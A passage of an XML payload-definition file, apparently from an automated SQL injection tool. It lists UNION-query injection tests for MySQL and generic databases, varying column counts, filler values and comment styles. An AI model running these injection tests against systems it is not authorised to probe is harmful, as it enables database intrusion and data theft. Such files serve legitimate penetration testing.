 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>#</comment>
 | 
			
		||||
            <char>[RANDNUM]</char>
 | 
			
		||||
            <columns>11-20</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL UNION query ([CHAR]) - 21 to 30 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>#</comment>
 | 
			
		||||
            <char>[CHAR]</char>
 | 
			
		||||
            <columns>21-30</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL UNION query (NULL) - 21 to 30 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>#</comment>
 | 
			
		||||
            <char>NULL</char>
 | 
			
		||||
            <columns>21-30</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL UNION query ([RANDNUM]) - 21 to 30 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>4</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>#</comment>
 | 
			
		||||
            <char>[RANDNUM]</char>
 | 
			
		||||
            <columns>21-30</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL UNION query ([CHAR]) - 31 to 40 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>4</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>#</comment>
 | 
			
		||||
            <char>[CHAR]</char>
 | 
			
		||||
            <columns>31-40</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL UNION query (NULL) - 31 to 40 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>4</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>#</comment>
 | 
			
		||||
            <char>NULL</char>
 | 
			
		||||
            <columns>31-40</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL UNION query ([RANDNUM]) - 31 to 40 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>5</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>#</comment>
 | 
			
		||||
            <char>[RANDNUM]</char>
 | 
			
		||||
            <columns>31-40</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL UNION query ([CHAR]) - 41 to 50 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>5</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>#</comment>
 | 
			
		||||
            <char>[CHAR]</char>
 | 
			
		||||
            <columns>41-50</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL UNION query (NULL) - 41 to 50 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>5</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>#</comment>
 | 
			
		||||
            <char>NULL</char>
 | 
			
		||||
            <columns>41-50</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>MySQL UNION query ([RANDNUM]) - 41 to 50 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>5</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>#</comment>
 | 
			
		||||
            <char>[RANDNUM]</char>
 | 
			
		||||
            <columns>41-50</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
        <details>
 | 
			
		||||
            <dbms>MySQL</dbms>
 | 
			
		||||
        </details>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>1</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>-- </comment>
 | 
			
		||||
            <char>[CHAR]</char>
 | 
			
		||||
            <columns>[COLSTART]-[COLSTOP]</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Generic UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>1</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>-- </comment>
 | 
			
		||||
            <char>NULL</char>
 | 
			
		||||
            <columns>[COLSTART]-[COLSTOP]</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Generic UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>-- </comment>
 | 
			
		||||
            <char>[RANDNUM]</char>
 | 
			
		||||
            <columns>[COLSTART]-[COLSTOP]</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Generic UNION query ([CHAR]) - 1 to 10 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>1</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>-- </comment>
 | 
			
		||||
            <char>[CHAR]</char>
 | 
			
		||||
            <columns>1-10</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Generic UNION query (NULL) - 1 to 10 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>1</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>-- </comment>
 | 
			
		||||
            <char>NULL</char>
 | 
			
		||||
            <columns>1-10</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Generic UNION query ([RANDNUM]) - 1 to 10 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>-- </comment>
 | 
			
		||||
            <char>[RANDNUM]</char>
 | 
			
		||||
            <columns>1-10</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Generic UNION query ([CHAR]) - 11 to 20 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>2</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>-- </comment>
 | 
			
		||||
            <char>[CHAR]</char>
 | 
			
		||||
            <columns>11-20</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Generic UNION query (NULL) - 11 to 20 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>2</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>-- </comment>
 | 
			
		||||
            <char>NULL</char>
 | 
			
		||||
            <columns>11-20</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Generic UNION query ([RANDNUM]) - 11 to 20 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>-- </comment>
 | 
			
		||||
            <char>[RANDNUM]</char>
 | 
			
		||||
            <columns>11-20</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Generic UNION query ([CHAR]) - 21 to 30 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>-- </comment>
 | 
			
		||||
            <char>[CHAR]</char>
 | 
			
		||||
            <columns>21-30</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Generic UNION query (NULL) - 21 to 30 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>3</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>-- </comment>
 | 
			
		||||
            <char>NULL</char>
 | 
			
		||||
            <columns>21-30</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Generic UNION query ([RANDNUM]) - 21 to 30 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>4</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>-- </comment>
 | 
			
		||||
            <char>[RANDNUM]</char>
 | 
			
		||||
            <columns>21-30</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Generic UNION query ([CHAR]) - 31 to 40 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>4</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>-- </comment>
 | 
			
		||||
            <char>[CHAR]</char>
 | 
			
		||||
            <columns>31-40</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Generic UNION query (NULL) - 31 to 40 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>4</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>-- </comment>
 | 
			
		||||
            <char>NULL</char>
 | 
			
		||||
            <columns>31-40</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Generic UNION query ([RANDNUM]) - 31 to 40 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>5</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>-- </comment>
 | 
			
		||||
            <char>[RANDNUM]</char>
 | 
			
		||||
            <columns>31-40</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Generic UNION query ([CHAR]) - 41 to 50 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>5</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>-- </comment>
 | 
			
		||||
            <char>[CHAR]</char>
 | 
			
		||||
            <columns>41-50</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
    </test>
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Generic UNION query (NULL) - 41 to 50 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>5</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>-- </comment>
 | 
			
		||||
            <char>NULL</char>
 | 
			
		||||
            <columns>41-50</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
    </test>
 | 
			
		||||
 | 
			
		||||
    <test>
 | 
			
		||||
        <title>Generic UNION query ([RANDNUM]) - 41 to 50 columns</title>
 | 
			
		||||
        <stype>3</stype>
 | 
			
		||||
        <level>5</level>
 | 
			
		||||
        <risk>1</risk>
 | 
			
		||||
        <clause>1,2,3,4,5</clause>
 | 
			
		||||
        <where>1</where>
 | 
			
		||||
        <vector>[UNION]</vector>
 | 
			
		||||
        <request>
 | 
			
		||||
            <payload/>
 | 
			
		||||
            <comment>-- </comment>
 | 
			
		||||
            <char>[RANDNUM]</char>
 | 
			
		||||
            <columns>41-50</columns>
 | 
			
		||||
        </request>
 | 
			
		||||
        <response>
 | 
			
		||||
            <union/>
 | 
			
		||||
        </response>
 | 
			
		||||
    </test>
 | 
			
		||||
    <!-- End of UNION query tests -->
 | 
			
		||||
</root>
 | 
			
		||||